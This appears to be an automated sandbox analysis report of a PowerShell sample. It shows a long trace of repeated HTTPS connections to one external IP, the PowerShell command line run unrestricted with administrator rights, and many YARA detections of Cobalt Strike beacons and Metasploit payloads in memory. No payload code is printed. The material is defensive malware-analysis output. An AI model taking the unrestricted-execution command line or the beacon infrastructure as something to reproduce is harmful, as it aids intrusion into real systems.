Oct 26, 2024 13:47:07.832997084 CEST	50218	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:07.833014011 CEST	443	50218	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:07.834259033 CEST	50219	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:07.834296942 CEST	443	50219	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:07.834511995 CEST	50219	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:07.834727049 CEST	50219	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:07.834737062 CEST	443	50219	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:09.148200035 CEST	443	50219	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:09.148313046 CEST	50219	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.148487091 CEST	50219	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.148509026 CEST	443	50219	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:09.149063110 CEST	50220	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.149125099 CEST	443	50220	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:09.149317026 CEST	50220	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.149379969 CEST	50220	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.149445057 CEST	443	50220	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:09.149501085 CEST	50220	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.259507895 CEST	50221	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.259560108 CEST	443	50221	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:09.259659052 CEST	50221	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.259887934 CEST	50221	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:09.259901047 CEST	443	50221	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:10.544087887 CEST	443	50221	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:10.544254065 CEST	50221	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:10.546814919 CEST	50221	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:10.546847105 CEST	443	50221	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:10.547461033 CEST	50222	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:10.547564030 CEST	443	50222	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:10.547662973 CEST	50222	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:10.547998905 CEST	50222	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:10.548036098 CEST	443	50222	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:11.826467991 CEST	443	50222	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:11.826553106 CEST	50222	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.826661110 CEST	50222	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.826706886 CEST	443	50222	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:11.827383995 CEST	50223	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.827500105 CEST	443	50223	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:11.827595949 CEST	50223	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.827687025 CEST	50223	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.827732086 CEST	443	50223	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:11.827788115 CEST	50223	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.930347919 CEST	50224	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.930402040 CEST	443	50224	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:11.930490017 CEST	50224	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.930751085 CEST	50224	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:11.930763960 CEST	443	50224	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:13.235575914 CEST	443	50224	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:13.235790968 CEST	50224	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:13.236335039 CEST	50224	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:13.236341000 CEST	50225	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:13.236351967 CEST	443	50224	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:13.236381054 CEST	443	50225	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:13.236462116 CEST	50225	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:13.236711979 CEST	50225	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:13.236721992 CEST	443	50225	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:14.515708923 CEST	443	50225	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:14.515810013 CEST	50225	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.515945911 CEST	50225	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.515965939 CEST	443	50225	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:14.517251968 CEST	50226	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.517290115 CEST	443	50226	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:14.517417908 CEST	50226	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.517663002 CEST	50226	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.517679930 CEST	443	50226	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:14.517772913 CEST	50226	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.633699894 CEST	50227	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.633759022 CEST	443	50227	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:14.633891106 CEST	50227	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.634216070 CEST	50227	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:14.634227037 CEST	443	50227	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:15.894264936 CEST	443	50227	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:15.894330978 CEST	50227	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:15.894404888 CEST	50227	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:15.894422054 CEST	443	50227	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:15.895034075 CEST	50228	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:15.895052910 CEST	443	50228	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:15.895116091 CEST	50228	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:15.895319939 CEST	50228	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:15.895329952 CEST	443	50228	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:17.194031000 CEST	443	50228	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:17.194160938 CEST	50228	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.194241047 CEST	50228	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.194262028 CEST	443	50228	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:17.194937944 CEST	50229	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.195067883 CEST	443	50229	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:17.195168972 CEST	50229	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.195240021 CEST	50229	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.195341110 CEST	443	50229	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:17.195398092 CEST	50229	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.306571007 CEST	50230	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.306621075 CEST	443	50230	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:17.306761026 CEST	50230	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.307004929 CEST	50230	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:17.307020903 CEST	443	50230	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:18.756711960 CEST	443	50230	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:18.756779909 CEST	50230	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:18.756844997 CEST	50230	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:18.756863117 CEST	443	50230	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:18.757487059 CEST	50231	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:18.757531881 CEST	443	50231	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:18.757605076 CEST	50231	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:18.757844925 CEST	50231	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:18.757862091 CEST	443	50231	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:20.044064045 CEST	443	50231	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:20.044128895 CEST	50231	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.044204950 CEST	50231	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.044226885 CEST	443	50231	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:20.044945002 CEST	50232	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.044974089 CEST	443	50232	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:20.045058966 CEST	50232	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.045089006 CEST	50232	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.045150042 CEST	443	50232	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:20.045193911 CEST	50232	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.149106026 CEST	50233	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.149168015 CEST	443	50233	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:20.149245024 CEST	50233	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.149544001 CEST	50233	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:20.149560928 CEST	443	50233	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:21.430773020 CEST	443	50233	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:21.430912018 CEST	50233	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:21.431009054 CEST	50233	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:21.431027889 CEST	443	50233	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:21.431760073 CEST	50234	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:21.431807995 CEST	443	50234	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:21.431890965 CEST	50234	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:21.432212114 CEST	50234	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:21.432224035 CEST	443	50234	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:22.772944927 CEST	443	50234	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:22.773128986 CEST	50234	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.773303032 CEST	50234	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.773319006 CEST	443	50234	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:22.774060011 CEST	50235	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.774095058 CEST	443	50235	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:22.774255037 CEST	50235	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.774332047 CEST	50235	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.774364948 CEST	443	50235	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:22.774488926 CEST	50235	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.883333921 CEST	50236	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.883385897 CEST	443	50236	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:22.883702040 CEST	50236	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.883729935 CEST	50236	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:22.883737087 CEST	443	50236	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:24.211405993 CEST	443	50236	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:24.211499929 CEST	50236	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:24.211596012 CEST	50236	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:24.211626053 CEST	443	50236	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:24.212169886 CEST	50237	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:24.212222099 CEST	443	50237	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:24.212301970 CEST	50237	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:24.212483883 CEST	50237	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:24.212502003 CEST	443	50237	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:25.513972998 CEST	443	50237	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:25.514153957 CEST	50237	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.514153957 CEST	50237	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.514758110 CEST	50238	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.514797926 CEST	443	50238	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:25.514863968 CEST	50238	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.514923096 CEST	50238	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.514964104 CEST	443	50238	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:25.515011072 CEST	50238	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.618954897 CEST	50239	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.618992090 CEST	443	50239	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:25.619071960 CEST	50239	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.619297028 CEST	50239	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.619307995 CEST	443	50239	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:25.820051908 CEST	50237	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:25.820063114 CEST	443	50237	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:26.900438070 CEST	443	50239	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:26.900568008 CEST	50239	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:26.900784016 CEST	50239	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:26.900795937 CEST	443	50239	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:26.901459932 CEST	50240	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:26.901484966 CEST	443	50240	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:26.901552916 CEST	50240	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:26.901757002 CEST	50240	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:26.901770115 CEST	443	50240	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:28.210264921 CEST	443	50240	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:28.210473061 CEST	50240	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.210560083 CEST	50240	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.210582018 CEST	443	50240	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:28.211266994 CEST	50241	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.211299896 CEST	443	50241	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:28.211410999 CEST	50241	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.211483955 CEST	50241	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.211500883 CEST	443	50241	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:28.211544037 CEST	50241	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.321105957 CEST	50242	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.321141958 CEST	443	50242	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:28.321239948 CEST	50242	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.321552992 CEST	50242	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:28.321568012 CEST	443	50242	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:29.616611958 CEST	443	50242	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:29.616847038 CEST	50242	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:29.617556095 CEST	50242	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:29.617556095 CEST	50243	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:29.617568016 CEST	443	50242	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:29.617599010 CEST	443	50243	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:29.617711067 CEST	50243	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:29.618079901 CEST	50243	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:29.618093014 CEST	443	50243	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:30.934320927 CEST	443	50243	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:30.934504986 CEST	50243	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:30.934504986 CEST	50243	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:30.934978008 CEST	50244	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:30.935030937 CEST	443	50244	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:30.935122967 CEST	50244	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:30.935159922 CEST	50244	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:30.935209990 CEST	443	50244	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:30.935286045 CEST	50244	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:31.039675951 CEST	50245	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:31.039733887 CEST	443	50245	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:31.039899111 CEST	50245	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:31.040297031 CEST	50245	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:31.040312052 CEST	443	50245	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:31.242120981 CEST	50243	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:31.242161036 CEST	443	50243	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:32.343127012 CEST	443	50245	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:32.345455885 CEST	50245	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:32.345455885 CEST	50245	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:32.345900059 CEST	50246	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:32.345921993 CEST	443	50246	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:32.346009016 CEST	50246	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:32.346240997 CEST	50246	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:32.346251011 CEST	443	50246	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:32.648190022 CEST	50245	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:32.648221970 CEST	443	50245	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:33.621022940 CEST	443	50246	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:33.621146917 CEST	50246	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.626507044 CEST	50246	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.626538992 CEST	443	50246	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:33.627120018 CEST	50247	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.627170086 CEST	443	50247	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:33.627245903 CEST	50247	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.627283096 CEST	50247	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.627360106 CEST	443	50247	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:33.627413034 CEST	50247	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.744064093 CEST	50248	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.744169950 CEST	443	50248	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:33.744311094 CEST	50248	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.744519949 CEST	50248	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:33.744550943 CEST	443	50248	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:35.043286085 CEST	443	50248	20.25.126.96	192.168.2.6
Oct 26, 2024 13:47:35.043395996 CEST	50248	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:37.057184935 CEST	50248	443	192.168.2.6	20.25.126.96
Oct 26, 2024 13:47:37.057259083 CEST	443	50248	20.25.126.96	192.168.2.6

Target ID:	0
Start time:	07:43:28
Start date:	26/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4602998708.000001A6ED0B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4603023734.000001A6ED2E0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4603295907.000001A6ED330000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4595950980.000001A6E4B7C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4580368839.000001A6D5739000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp, 